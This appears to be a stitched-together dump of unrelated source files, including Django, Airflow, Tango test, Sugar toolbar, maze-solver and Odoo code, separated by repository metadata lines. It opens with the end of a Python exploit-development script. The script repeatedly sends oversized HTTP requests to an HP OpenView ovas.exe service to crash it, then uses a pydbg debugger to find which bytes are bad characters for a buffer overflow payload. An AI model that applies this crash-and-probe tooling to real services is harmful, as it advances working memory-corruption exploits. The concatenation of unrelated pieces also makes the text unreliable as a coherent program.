"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
request_template = (
"GET /topology/homeBaseView HTTP/1.1\r\n"
"Host: {}\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
"Content-Length: 1048580\r\n\r\n"
)
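# The {} placeholder in the Host header above is where crash_service() injects
# its oversized buffer; the Content-Length value is kept as in the original
# exploit template.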
# Current char that is being checked
cur_char = ""
badchars = []
goodchars = []
evil_str_sent = False
service_is_running = False
def chars_to_str(chars):
# Convert a list of chars to a string
result = ""
for char in chars:
result += "\\x{:02x}".format(ord(char))
return result
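# Example: chars_to_str(['\x00', 'A']) yields the printable string "\x00\x41".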
def crash_service():
# Send malformed data to ovas service in order to crash it. Function runs in an independent thread
global evil_str_sent, cur_char, badchars, goodchars, allchars
global service_is_running
char_counter = -1
timer = 0
while True:
# Don't send evil string if process is not running
if not service_is_running:
time.sleep(1)
continue
# If main loop reset the evil_str_sent flag to False, sent evil_str again
if not evil_str_sent:
timer = 0
char_counter += 1
if char_counter > len(allchars)-1:
print("[+] Bad chars: {}.".format(chars_to_str(badchars)))
print("[+] Good chars: {}.".format(chars_to_str(goodchars)))
print("[+] Done.")
# Hack to exit application from non-main thread
os._exit(0)
cur_char = allchars[char_counter]
# During crash [ESP + 4C] points to ("A" * 1025)th position
crash = "A" * 1025 + cur_char * 4 + "B" * 2551
evil_str = request_template.format(crash)
print("[+] Sending evil HTTP request...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
sock.send(evil_str)
sock.close()
except:
print("[+] Error sending malicious buffer; service may be down.")
print("[+] Restarting the service and retrying...")
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
finally:
evil_str_sent = True
else:
if timer > 10:
print("[+] 10 seconds passed without a crash. Bad char probably prevented the crash.")
print("[+] Marking last char as bad and killing the service...")
badchars.append(cur_char)
print("[+] Bad chars so far: {}.".format(chars_to_str(badchars)))
with open("badchars.txt",'w') as f:
f.write(chars_to_str(badchars))
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
time.sleep(1)
timer += 1
return
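# Thread handshake note: the main pydbg loop clears evil_str_sent once a crash
# has been analysed, which signals this worker thread to move on to the next
# candidate byte.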
def is_service_started():
# Check if service was successfully started
print("[+] Making sure the service was restarted...")
service_check_counter = 0
while not service_is_running:
if service_check_counter > 4: # Give it 5 attempts
return False
for process in wmi.WMI().Win32_Process():
            if process.Name == 'ovas.exe':
return process.ProcessId
service_check_counter += 1
time.sleep(1)
def is_service_responsive():
# Check if service responds to HTTP requests
print("[+] Making sure the service responds to HTTP requests...")
service_check_counter = 0
while not service_is_running:
# Give it 5 attempts
if service_check_counter > 4:
return False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
test_str = request_template.format("127.0.0.1")
sock.send(test_str)
# Give response 1 second to arrive
sock.settimeout(1.0)
resp = sock.recv(1024)
if resp:
return True
sock.close()
except Exception as e:
pass
service_check_counter += 1
def restart_service():
# Restart ovas.exe service and return its PID
global service_is_running
service_is_running = False
# Check that the service is running before stopping it
for process in wmi.WMI().Win32_Process():
        if process.Name == 'ovas.exe':
print("[+] Stopping the service...")
# Forcefully terminate the process
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
print("[+] Starting the service...")
    # Run ovstop before ovstart so a fresh ovas process is spawned reliably
subprocess.Popen('ovstop -c ovas').communicate()
subprocess.Popen('ovstart -c ovas').communicate()
pid = is_service_started()
if pid:
print("[+] The service was restarted.")
else:
print("[-] Service was not found in process list. Restarting...")
return restart_service()
if is_service_responsive():
print("[+] Service responds to HTTP requests. Green ligth.")
service_is_running = True
return pid
else:
print("[-] Service does not respond to HTTP requests. Restarting...")
return restart_service()
def check_char(rawdata):
# Compare the buffer sent with the one in memory to see if it has been mangled in order to identify bad characters.
global badchars, goodchars
hexdata = dbg.hex_dump(rawdata)
print("[+] Buffer: {}".format(hexdata))
# Sent data must be equal to data in memory
if rawdata == (cur_char * 4):
goodchars.append(cur_char)
print("[+] Char {} is good.".format(chars_to_str(cur_char)))
print("[+] Good chars so far: {}.".format(chars_to_str(goodchars)))
with open("goodchars.txt",'w') as f:
f.write(chars_to_str(goodchars))
else:
badchars.append(cur_char)
print("[+] Char {} is bad.".format(chars_to_str(cur_char)))
print("[+] Bad chars so far: {}.".format(chars_to_str(badchars)))
with open("badchars.txt",'w') as f:
f.write(chars_to_str(badchars))
return
def _access_violation_handler(dbg):
# On access violation read data from a pointer on the stack to determine if the sent buffer was mangled in any way
print("[+] Access violation caught.")
# [ESP + 0x4C] points to our test buffer
esp_offset = 0x4C
buf_address = dbg.read(dbg.context.Esp + esp_offset, 0x4)
buf_address = dbg.flip_endian_dword(buf_address)
print("[+] [DEBUG] buf_address: {}".format(buf_address))
if buf_address:
# Read 4 bytes test buffer
buffer = dbg.read(buf_address, 0x4)
print("[+] buffer is " + buffer);
else:
# Now when the first request sent is the one for checking if the
# service responds, the buf_address sometimes returns 0. This is to
# handle that case.
buffer = ""
print("[+] Checking whether the char is good or bad...")
check_char(buffer)
dbg.detach()
return DBG_EXCEPTION_NOT_HANDLED
def debug_process(pid):
    # Create a debugger instance and attach it to the ovas.exe PID
dbg = pydbg()
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, _access_violation_handler)
while True:
try:
print("[+] Attaching debugger to pid: {}.".format(pid))
if dbg.attach(pid):
return dbg
else:
return False
except Exception as e:
print("[+] Error while attaching: {}.".format(e.message))
return False
if __name__ == '__main__':
# Create and start crasher thread
crasher_thread = threading.Thread(target=crash_service)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] thread started");
# Main loop
while True:
pid = restart_service()
print("[+] restart_service "+str(pid));
dbg = debug_process(pid)
print("[+] dbg started");
if dbg:
# Tell crasher thread to send malicious input to process
evil_str_sent = False
# Enter the debugging loop
dbg.run() | mit | 5,686,919,584,607,260,000 | 29.754386 | 116 | 0.674464 | false |
MarxDimitri/schmankerl | schmankerlapp/models.py | 1 | 1505 | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Restaurant(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='restaurant')
name = models.CharField(max_length=500)
phone = models.CharField(max_length=500)
address = models.CharField(max_length=500)
logo = models.ImageField(upload_to='restaurant_logo/', blank=False)
def __str__(self):
return self.name
class Customer(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='customer')
avatar = models.CharField(max_length=500)
phone = models.CharField(max_length=500, blank=True)
address = models.CharField(max_length=500, blank=True)
def __str__(self):
return self.user.get_full_name()
class Driver(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='driver')
avatar = models.CharField(max_length=500)
phone = models.CharField(max_length=500, blank=True)
address = models.CharField(max_length=500, blank=True)
def __str__(self):
return self.user.get_full_name()
class Meal(models.Model):
    # on_delete is accepted on Django 1.x and required from 2.0 on; CASCADE is
    # assumed here to match the OneToOneFields above
    restaurant = models.ForeignKey(Restaurant, on_delete=models.CASCADE)
name = models.CharField(max_length=500)
short_description = models.CharField(max_length=500)
image = models.ImageField(upload_to='meal_images/', blank=False)
price = models.FloatField(default=0)
def __str__(self):
return self.name
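# Illustrative query (not part of the original models): meals belonging to a
# given owner could be fetched with
#     Meal.objects.filter(restaurant__user=some_user)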
| apache-2.0 | 687,804,165,970,565,200 | 35.707317 | 90 | 0.706312 | false |
Fokko/incubator-airflow | airflow/ti_deps/deps/trigger_rule_dep.py | 1 | 9884 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from sqlalchemy import case, func
import airflow
from airflow.ti_deps.deps.base_ti_dep import BaseTIDep
from airflow.utils.db import provide_session
from airflow.utils.state import State
class TriggerRuleDep(BaseTIDep):
"""
Determines if a task's upstream tasks are in a state that allows a given task instance
to run.
"""
NAME = "Trigger Rule"
IGNOREABLE = True
IS_TASK_DEP = True
@provide_session
def _get_dep_statuses(self, ti, session, dep_context):
TI = airflow.models.TaskInstance
TR = airflow.utils.trigger_rule.TriggerRule
# Checking that all upstream dependencies have succeeded
if not ti.task.upstream_list:
yield self._passing_status(
reason="The task instance did not have any upstream tasks.")
return
if ti.task.trigger_rule == TR.DUMMY:
yield self._passing_status(reason="The task had a dummy trigger rule set.")
return
# TODO(unknown): this query becomes quite expensive with dags that have many
# tasks. It should be refactored to let the task report to the dag run and get the
# aggregates from there.
qry = (
session
.query(
func.coalesce(func.sum(
case([(TI.state == State.SUCCESS, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.SKIPPED, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.FAILED, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.UPSTREAM_FAILED, 1)], else_=0)), 0),
func.count(TI.task_id),
)
.filter(
TI.dag_id == ti.dag_id,
TI.task_id.in_(ti.task.upstream_task_ids),
TI.execution_date == ti.execution_date,
TI.state.in_([
State.SUCCESS, State.FAILED,
State.UPSTREAM_FAILED, State.SKIPPED]),
)
)
successes, skipped, failed, upstream_failed, done = qry.first()
yield from self._evaluate_trigger_rule(
ti=ti,
successes=successes,
skipped=skipped,
failed=failed,
upstream_failed=upstream_failed,
done=done,
flag_upstream_failed=dep_context.flag_upstream_failed,
session=session)
@provide_session
def _evaluate_trigger_rule(
self,
ti,
successes,
skipped,
failed,
upstream_failed,
done,
flag_upstream_failed,
session):
"""
Yields a dependency status that indicate whether the given task instance's trigger
rule was met.
:param ti: the task instance to evaluate the trigger rule of
:type ti: airflow.models.TaskInstance
:param successes: Number of successful upstream tasks
:type successes: int
:param skipped: Number of skipped upstream tasks
:type skipped: int
:param failed: Number of failed upstream tasks
:type failed: int
:param upstream_failed: Number of upstream_failed upstream tasks
:type upstream_failed: int
:param done: Number of completed upstream tasks
:type done: int
:param flag_upstream_failed: This is a hack to generate
the upstream_failed state creation while checking to see
whether the task instance is runnable. It was the shortest
path to add the feature
:type flag_upstream_failed: bool
:param session: database session
:type session: sqlalchemy.orm.session.Session
"""
TR = airflow.utils.trigger_rule.TriggerRule
task = ti.task
upstream = len(task.upstream_task_ids)
tr = task.trigger_rule
upstream_done = done >= upstream
upstream_tasks_state = {
"total": upstream, "successes": successes, "skipped": skipped,
"failed": failed, "upstream_failed": upstream_failed, "done": done
}
# TODO(aoen): Ideally each individual trigger rules would be its own class, but
# this isn't very feasible at the moment since the database queries need to be
# bundled together for efficiency.
# handling instant state assignment based on trigger rules
if flag_upstream_failed:
if tr == TR.ALL_SUCCESS:
if upstream_failed or failed:
ti.set_state(State.UPSTREAM_FAILED, session)
elif skipped:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ALL_FAILED:
if successes or skipped:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ONE_SUCCESS:
if upstream_done and not successes:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ONE_FAILED:
if upstream_done and not (failed or upstream_failed):
ti.set_state(State.SKIPPED, session)
elif tr == TR.NONE_FAILED:
if upstream_failed or failed:
ti.set_state(State.UPSTREAM_FAILED, session)
elif skipped == upstream:
ti.set_state(State.SKIPPED, session)
elif tr == TR.NONE_SKIPPED:
if skipped:
ti.set_state(State.SKIPPED, session)
if tr == TR.ONE_SUCCESS:
if successes <= 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires one upstream "
"task success, but none were found. "
"upstream_tasks_state={1}, upstream_task_ids={2}"
.format(tr, upstream_tasks_state, task.upstream_task_ids))
elif tr == TR.ONE_FAILED:
if not failed and not upstream_failed:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires one upstream "
"task failure, but none were found. "
"upstream_tasks_state={1}, upstream_task_ids={2}"
.format(tr, upstream_tasks_state, task.upstream_task_ids))
elif tr == TR.ALL_SUCCESS:
num_failures = upstream - successes
if num_failures > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have succeeded, but found {1} non-success(es). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_failures, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.ALL_FAILED:
num_successes = upstream - failed - upstream_failed
if num_successes > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have failed, but found {1} non-failure(s). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_successes, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.ALL_DONE:
if not upstream_done:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have completed, but found {1} task(s) that "
"weren't done. upstream_tasks_state={2}, "
"upstream_task_ids={3}"
.format(tr, upstream_done, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.NONE_FAILED:
num_failures = upstream - successes - skipped
if num_failures > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have succeeded or been skipped, but found {1} non-success(es). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_failures, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.NONE_SKIPPED:
if not upstream_done or (skipped > 0):
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to not have been skipped, but found {1} task(s) skipped. "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, skipped, upstream_tasks_state,
task.upstream_task_ids))
else:
yield self._failing_status(
reason="No strategy to evaluate trigger rule '{0}'.".format(tr))
| apache-2.0 | -311,230,294,439,406,660 | 43.32287 | 94 | 0.563234 | false |
nexdatas/configserver | test/NXSConfigServer_test.py | 1 | 4015 | #!/usr/bin/env python
# This file is part of nexdatas - Tango Server for NeXus data writer
#
# Copyright (C) 2012-2017 DESY, Jan Kotanski <[email protected]>
#
# nexdatas is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nexdatas is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with nexdatas. If not, see <http://www.gnu.org/licenses/>.
# \package test nexdatas
# \file NXSConfigServer_test.py
# unittests for field Tags running Tango Server
#
import unittest
import sys
import time
import PyTango
# import XMLConTest as XMLConfigurator_test
# from nxsconfigserver import XMLConfigurator
import nxsconfigserver
# test fixture
try:
from . import ServerSetUp
except Exception:
import ServerSetUp
try:
from . import XMLConfigurator_test
except Exception:
import XMLConfigurator_test
if sys.version_info > (3,):
long = int
class NXSConfigServerTest(XMLConfigurator_test.XMLConfiguratorTest):
# constructor
# \param methodName name of the test method
def __init__(self, methodName):
XMLConfigurator_test.XMLConfiguratorTest.__init__(self, methodName)
self._sv = ServerSetUp.ServerSetUp()
# test starter
# \brief Common set up of Tango Server
def setUp(self):
self._sv.setUp()
print("SEED = %s" % self.seed)
# test closer
# \brief Common tear down oif Tango Server
def tearDown(self):
XMLConfigurator_test.XMLConfiguratorTest.tearDown(self)
self._sv.tearDown()
# opens config server
# \param args connection arguments
# \returns NXSConfigServer instance
def openConfig(self, args):
found = False
cnt = 0
while not found and cnt < 1000:
try:
sys.stdout.write("\b.")
xmlc = PyTango.DeviceProxy(
self._sv.new_device_info_writer.name)
time.sleep(0.01)
                if xmlc.state() == PyTango.DevState.ON:
                    found = True
            except Exception as e:
                print("%s %s" % (self._sv.new_device_info_writer.name, e))
                found = False
cnt += 1
if not found:
raise Exception(
"Cannot connect to %s"
% self._sv.new_device_info_writer.name)
if xmlc.state() == PyTango.DevState.ON:
xmlc.JSONSettings = args
xmlc.Open()
version = xmlc.version
vv = version.split('.')
self.revision = long(vv[-1])
self.version = ".".join(vv[0:3])
self.label = ".".join(vv[3:-1])
self.assertEqual(self.version, nxsconfigserver.__version__)
self.assertEqual(self.label, '.'.join(xmlc.Version.split('.')[3:-1]))
self.assertEqual(xmlc.state(), PyTango.DevState.OPEN)
return xmlc
# closes opens config server
# \param xmlc XMLConfigurator instance
def closeConfig(self, xmlc):
self.assertEqual(xmlc.state(), PyTango.DevState.OPEN)
xmlc.Close()
self.assertEqual(xmlc.state(), PyTango.DevState.ON)
# sets xmlconfiguration
# \param xmlc configuration instance
# \param xml xml configuration string
def setXML(self, xmlc, xml):
xmlc.XMLString = xml
# gets xmlconfiguration
# \param xmlc configuration instance
# \returns xml configuration string
def getXML(self, xmlc):
return xmlc.XMLString
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 5,636,351,133,139,023,000 | 28.740741 | 77 | 0.631382 | false |
walterbender/story | toolbar_utils.py | 1 | 5567 | # -*- coding: utf-8 -*-
# Copyright (c) 2011, Walter Bender
# Port To GTK3:
# Ignacio Rodriguez <[email protected]>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# You should have received a copy of the GNU General Public License
# along with this library; if not, write to the Free Software
# Foundation, 51 Franklin Street, Suite 500 Boston, MA 02110-1335 USA
from gi.repository import Gtk
from sugar3.graphics.radiotoolbutton import RadioToolButton
from sugar3.graphics.toolbutton import ToolButton
from sugar3.graphics.combobox import ComboBox
def combo_factory(combo_array, toolbar, callback, cb_arg=None,
tooltip=None, default=None):
'''Factory for making a toolbar combo box'''
combo = ComboBox()
if tooltip is not None and hasattr(combo, 'set_tooltip_text'):
combo.set_tooltip_text(tooltip)
if cb_arg is not None:
combo.connect('changed', callback, cb_arg)
else:
combo.connect('changed', callback)
for i, selection in enumerate(combo_array):
combo.append_item(i, selection, None)
combo.show()
toolitem = Gtk.ToolItem()
toolitem.add(combo)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(toolitem, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(toolitem, -1)
toolitem.show()
if default is not None:
combo.set_active(combo_array.index(default))
return combo
def entry_factory(default_string, toolbar, tooltip=None, max_chars=3):
''' Factory for adding a text box to a toolbar '''
entry = Gtk.Entry()
entry.set_text(default_string)
if tooltip is not None and hasattr(entry, 'set_tooltip_text'):
entry.set_tooltip_text(tooltip)
    entry.set_width_chars(max_chars)
entry.show()
toolitem = Gtk.ToolItem()
toolitem.add(entry)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(toolitem, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(toolitem, -1)
toolitem.show()
return entry
def button_factory(icon_name, toolbar, callback, cb_arg=None, tooltip=None,
accelerator=None):
'''Factory for making tooplbar buttons'''
button = ToolButton(icon_name)
if tooltip is not None:
button.set_tooltip(tooltip)
button.props.sensitive = True
if accelerator is not None:
button.props.accelerator = accelerator
if cb_arg is not None:
button.connect('clicked', callback, cb_arg)
else:
button.connect('clicked', callback)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(button, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(button, -1)
button.show()
return button
def radio_factory(name, toolbar, callback, cb_arg=None, tooltip=None,
group=None):
''' Add a radio button to a toolbar '''
button = RadioToolButton(group=group)
button.set_icon_name(name)
if callback is not None:
if cb_arg is None:
button.connect('clicked', callback)
else:
button.connect('clicked', callback, cb_arg)
if hasattr(toolbar, 'insert'): # Add button to the main toolbar...
toolbar.insert(button, -1)
else: # ...or a secondary toolbar.
toolbar.props.page.insert(button, -1)
button.show()
if tooltip is not None:
button.set_tooltip(tooltip)
return button
def label_factory(toolbar, label_text, width=None):
''' Factory for adding a label to a toolbar '''
label = Gtk.Label(label_text)
label.set_line_wrap(True)
if width is not None:
label.set_size_request(width, -1) # doesn't work on XOs
label.show()
toolitem = Gtk.ToolItem()
toolitem.add(label)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(toolitem, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(toolitem, -1)
toolitem.show()
return label
def separator_factory(toolbar, expand=False, visible=True):
''' add a separator to a toolbar '''
separator = Gtk.SeparatorToolItem()
separator.props.draw = visible
separator.set_expand(expand)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(separator, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(separator, -1)
separator.show()
def image_factory(image, toolbar, tooltip=None):
''' Add an image to the toolbar '''
img = Gtk.Image()
img.set_from_pixbuf(image)
img_tool = Gtk.ToolItem()
img_tool.add(img)
if tooltip is not None:
img.set_tooltip_text(tooltip)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(img_tool, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(img_tool, -1)
img_tool.show()
return img
def spin_factory(default, min_value, max_value, callback, toolbar):
    spin_adj = Gtk.Adjustment(default, min_value, max_value, 1, 32, 0)
spin = Gtk.SpinButton(spin_adj, 0, 0)
spin.connect('value-changed', callback)
spin.set_numeric(True)
spin.show()
toolitem = Gtk.ToolItem()
toolitem.add(spin)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(toolitem, -1)
else:
toolbar.props.page.insert(toolitem, -1)
toolitem.show()
return spin
| gpl-3.0 | -1,535,071,521,111,068,200 | 32.945122 | 75 | 0.659062 | false |
tbjoern/adventofcode | Thirteen/refined.py | 1 | 2330 | import Queue
import time
import sys
seed = 1600
if len(sys.argv) > 1:
    try:
        seed = int(sys.argv[1])
    except ValueError:
        pass
width, height = 40,41
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def isWall(x,y):
num = x*x + 3*x + 2*x*y + y + y*y
num += seed
ones = 0
while num:
if num & 1:
ones += 1
num = num >> 1
return ones % 2 == 1
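# Worked example (assuming the AoC sample seed of 10): for (x, y) = (1, 1) the
# polynomial gives 1 + 3 + 2 + 1 + 1 + 10 = 18 = 0b10010; two set bits is even,
# so that cell is open space.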
def clear():
for i in range(height):
sys.stdout.write("\033[F") #back to previous line
sys.stdout.write("\033[K") #clear line
def render(lab):
for j in range(height):
line = ""
for i in range(width):
if lab[i][j]:
line += bcolors.OKBLUE + chr(176) + bcolors.ENDC
elif (i,j) == (1,1):
line += bcolors.FAIL + "S" + bcolors.ENDC
elif (i,j) == (31,39):
line += bcolors.OKGREEN + "E" + bcolors.ENDC
elif (i,j) in shortestPath:
line += bcolors.WARNING + "*" + bcolors.ENDC
elif pre[i][j]:
line += "."
else:
line += " "
print line
def renderStep(skip, amount):
if skip % amount == 0:
clear()
render(lab)
time.sleep(.15)
skip = 0
return skip + 1
shortestPath = []
lab = [[isWall(x,y) for y in range(height)] for x in range(width)]
pre = [[None for y in range(height)] for x in range(width)]
q = Queue.Queue()
q.put((1,1))
render(lab)
skip = 0
while not q.empty():
field = q.get()
for i in range(-1,2):
for j in range(-1,2):
            if i != j and i + j != 0:  # exactly one offset is non-zero -> 4-neighbourhood
adjField = (i+field[0], j + field[1])
if adjField[0] < 0 or adjField[0] >= width or adjField[1] < 0 or adjField[1] >= height:
continue
if not pre[adjField[0]][adjField[1]] and not lab[adjField[0]][adjField[1]]:
pre[adjField[0]][adjField[1]] = field
q.put(adjField)
    skip = renderStep(skip, 1)
if not pre[1][1] or not pre[31][39]:
print "There is no path here"
sys.exit()
clear()
render(lab)
shortestPath = []  # built from the goal back towards (but excluding) the start
u = (31,39)
while u != (1,1):
shortestPath.append(u)
u = pre[u[0]][u[1]]
    skip = renderStep(skip, 1)
clear()
render(lab)
print "Shortest path length: " + str(len(shortestPath)) | mit | -4,447,621,782,373,359,000 | 19.592593 | 91 | 0.562661 | false |
yeleman/health_ident | health_ident/management/commands/export_j2me.py | 1 | 2794 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import os
import zipfile
from django.conf import settings
from optparse import make_option
from django.core.management.base import BaseCommand
from django.template import loader, Context
from health_ident.models import Entity, HealthEntity
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('-f',
            help='ZIP file to write the generated J2ME sources to',
action='store',
            dest='output_file'),
make_option('-s',
help='Comma-separated list of Region Slugs to include',
action='store',
dest='only_regions'),
)
def handle(self, *args, **options):
export_dir = os.path.join(settings.BASE_DIR, 'j2me')
if not os.path.exists(export_dir):
os.mkdir(export_dir)
if options.get('only_regions'):
only_regions = options.get('only_regions').split(',')
regions = HealthEntity.objects.filter(slug__in=only_regions)
else:
mali = Entity.objects.get(slug='mali')
regions = HealthEntity.objects.filter(parent=mali)
print("Exporting Health Entities...")
for region in regions:
for district in region.get_children():
district_file_content = loader.get_template("j2me/EntityHashTableDistrict.java") \
.render(Context({'district': district}))
with open(os.path.join(export_dir, "EntityHashTable{}.java".format(district.slug)), 'w') as f:
f.write(district_file_content.encode('utf-8'))
print(district.name)
with open(os.path.join(export_dir, "Utils.java"), 'w') as f:
f.write(loader.get_template("j2me/Utils.java").render(Context({})).encode('utf-8'))
with open(os.path.join(export_dir, "EntityHashTable.java"), 'w') as f:
f.write(loader.get_template("j2me/EntityHashTable.java").render(Context({})).encode('utf-8'))
region_file_content = loader.get_template("j2me/StaticCodes.java") \
.render(Context({'regions': regions}))
with open(os.path.join(export_dir, "StaticCodes.java"), 'w') as f:
f.write(region_file_content.encode('utf-8'))
        zf = zipfile.ZipFile(options.get('output_file'), mode='w')
for asset in os.listdir(os.path.join(export_dir)):
zf.write(os.path.join(export_dir, asset),
os.path.join('snisi', 'entities', asset))
zf.close() | unlicense | 8,823,605,234,748,818,000 | 35.298701 | 110 | 0.582319 | false |
sumihai-tekindo/account_sicepat | add_sub_menu/models/check_id.py | 1 | 1245 | from datetime import datetime
from openerp.osv import fields,osv
from openerp.tools.translate import _
class purchase_requisition_line(osv.osv):
_inherit = "purchase.requisition.line"
def stock_out(self, cr, uid, ids,stock_out):
if self.stock_out:
return {
'view_type': 'form',
'flags': {'action_buttons': True},
'view_mode': 'kanban,form',
'res_model': 'stock.picking.type',
'target': 'current',
'res_id': 'stock.picking',
'type': 'ir.actions.act_window'
}
# def onchange_product_id(self, cr, uid, ids, product_id, product_uom_id, parent_analytic_account, analytic_account, parent_date, date, context=None):
# oc_res = super(purchase_requisition_line,self).onchange_product_id(cr, uid, ids, product_id, product_uom_id, parent_analytic_account, analytic_account, parent_date, date, context=context)
# if(product_id):
# product = self.pool.get('product.product').browse(cr,uid,product_id,context=context)
# if (product.default_code=='Asset'):
# warning={
# 'title':'WARNING',
# 'message':"There are %s %s for %s in stock"%(product.qty_available,product.uom_id.name,product.name)
# }
# oc_res.update({'warning':warning})
# return oc_res
| gpl-3.0 | -3,897,940,405,699,393,500 | 35.787879 | 191 | 0.659438 | false |
nkoep/blaplay | blaplay/formats/wav.py | 1 | 1831 | # blaplay, Copyright (C) 2012 Niklas Koep
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
import wave
from _blatrack import BlaTrack
from blaplay.formats import TagParseError
from _identifiers import *
